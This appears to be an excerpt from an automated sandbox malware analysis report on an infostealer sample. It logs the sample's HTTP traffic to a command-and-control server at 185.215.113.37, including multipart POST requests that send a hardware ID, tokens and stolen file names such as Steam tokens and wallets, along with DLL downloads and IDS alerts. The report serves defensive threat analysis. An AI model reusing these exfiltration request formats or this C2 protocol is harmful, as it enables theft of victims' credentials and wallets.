65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 2d 2d 0d 0a Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="file"------AFCBFIJEHDHCBGDGDGCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="file"------HIIIJDAAAAAAKECBFBAE--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAKHost: 185.215.113.37Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="message"wallets------AKEGDHJDHDAFHJJKJEHC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="message"ybncbhylepme------KJJECGHJDBFIJJJKEHCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 2d 2d 0d 0a Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file"------IJDBGDGCGDAKFIDGIDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="message"files------AKKKFBGDHJKFHJJJJDGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 2d 2d 0d 0a Data Ascii: ------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EBAKFIIJJKJJJJJJEGDA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49705 -> 185.215.113.37:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007660A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_007660A0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 34 37 43 44 36 43 32 32 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"B547CD6C22534228319403------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"save------GIDBKKKKKFBGDGDHIDBG--

Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll8
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllJ
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllg
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlly
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll0
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllV
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/b
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dllA
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdowsApps
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpll
Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1638110314.0000000001278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37d
Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpefox
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
